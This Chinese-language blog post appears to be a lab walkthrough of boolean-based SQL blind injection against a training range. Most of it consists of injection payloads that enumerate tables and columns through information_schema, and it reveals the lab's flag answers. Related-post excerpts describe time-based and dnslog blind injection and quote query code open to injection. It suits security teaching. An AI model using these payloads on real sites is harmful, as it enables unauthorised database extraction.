滲透測試(二)SQL盲注

2021-10-24 03:22:42 字數 1173 閱讀 7244

測試靶場(掌控安全學院sql注入靶場):

通過表單登入注入,原理與盲注1類似,僅存在傳參方式問題。

找出此資料庫存在的表

'or (select count(table_name) from information_schema.tables where table_schema=database())=3 #

以此得到共三張表

第一張表

'or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>=6 #

得到表名長度為6

'or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=108 #

通過burpsuite暴力拿到表名個字元:loflag

第二張表

'or length((select table_name from information_schema.tables where table_schema=database() limit 1,1))>=4 #

得到表名長度為4

'or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=108 #

拿到表名為:news

第三張表

類似查詢到表名為:user

從表loflag中找到欄位名

'or (select count(column_name) from information_schema.columns where table_schema=database() and table_name='loflag')=2 #

欄位名為:id、flaglo

找出flaglo欄位下的資料

zkaq-qqq、zkaq-rd、zkaq-moren、zkaq-time-hj

提交正確的資料:zkaq-moren

滲透測試 SQL盲注基於布林的盲注

普通sql注入和sql盲注的區別 sql盲注的思路 基於時間的盲注 通過構造真or假判斷條件的sql語句,且sql語句中根據需要聯合使用sleep 函式一同向伺服器傳送請求,觀察伺服器響應結果是否會執行所設定時間的延遲響應,以此來判斷所構造條件的真or假 若執行sleep延遲,則表示當前設定的判斷條...

sql盲注特點 SQL盲注

盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...

SQL盲注 時間盲注,dnslog盲注

時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...